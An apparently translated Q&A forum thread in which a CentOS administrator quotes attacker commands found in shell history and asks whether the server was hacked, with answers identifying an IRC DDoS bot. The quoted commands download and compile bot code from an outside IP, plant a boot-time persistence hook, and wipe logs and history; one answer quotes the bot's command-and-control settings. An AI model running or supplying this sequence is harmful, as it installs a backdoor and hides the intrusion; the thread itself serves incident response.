我们今天使用 Putty 远程登录到我们的 CentOS 服务器,在使用向上箭头浏览以前的命令时,偶然发现了以下内容:
unset HISTFILE
mkdir /usr/lib/tmp
cd /usr/lib/tmp
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh > /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &
(为了清楚起见,&& 被换行符替换)
我从来没有运行过这些命令!这是怎么发生的?我的服务器被黑客入侵了吗?我立即更改了我的 root 密码,但希望有人能弄清楚这里发生了什么。
我看到来源中提到了 DDoS 机器人,我和我的同事非常担心!
提前致谢!
答案1
是的,你被黑了。黑客安装了一个 IRC 后门,你正在连接到这个 IRC 服务器:
const int port = 1254;
const char channel[] = "#test";
const char password[]= "pass";
const char server[] = "heathen.cc";
bot herder 可以在你的服务器上执行任何命令。我建议关闭服务器并重新安装立即地。该机器人具有一些 DDoS 攻击功能,DNS 洪水、syn 洪水和 ICMP 洪水。它还可以在 Windows 上运行,这很酷。有一个非常古老的传播模块可以感染 myDoom。这看起来像一些旧的恶意软件。
答案2
无论如何,答案都是肯定的,您的服务器正在或已经被入侵。
您应该立即切断与服务器的互联网连接,进行完整备份(请记住其他文件也可能受到损害),然后重新安装。
此外,您可能希望通知运行僵尸网络(或任何内容)的 IP 的所有者。以下是RIPE whois 数据。
答案3
绝不允许 root 通过 SSH 登录。
答案4
听起来你已经被BOT_VERSION感染BOT_VERSION了
#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES
你的 Linux 防病毒软件没有发现这个问题吗?